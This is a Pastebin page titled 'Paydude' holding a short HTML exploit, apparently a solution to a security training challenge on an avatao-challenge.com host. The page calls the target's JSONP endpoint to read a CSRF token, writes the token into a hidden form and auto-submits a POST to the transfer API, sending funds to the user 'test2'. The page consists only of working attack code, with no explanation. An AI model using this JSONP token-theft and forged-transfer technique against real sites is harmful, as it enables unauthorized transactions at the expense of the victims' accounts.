Advertisement
khongi

Paydude

Nov 4th, 2019
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 0.81 KB | None | 0 0
  1. <html>
  2.   <body>
  3.     <form id="evilform" action="https://d57764de182658cfafc5947f3c848b83.54-229-160-138.avatao-challenge.com/api/transfer" method="post">
  4.       <input type="text" name="username" value="test2" />
  5.       <input type="text" name="amount" value="1" />
  6.       <input id="tokeninput" type="text" name="token" />
  7.     </form>
  8.   </body>
  9.  
  10.   <script>
  11.     function jsonPaydudeApi(a){
  12.       console.log(a);
  13.       var csrfToken = a['token'];
  14.       console.log(csrfToken);
  15.  
  16.       document.getElementById("tokeninput").value = csrfToken;
  17.       document.getElementById("evilform").submit();
  18.       alert("VIHIMA06");
  19.     }
  20.   </script>
  21.  
  22.   <script src="https://d57764de182658cfafc5947f3c848b83.54-229-160-138.avatao-challenge.com/api/getcsrf?api_key=241543903&format=json&nojsoncallback=0"></script >
  23. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement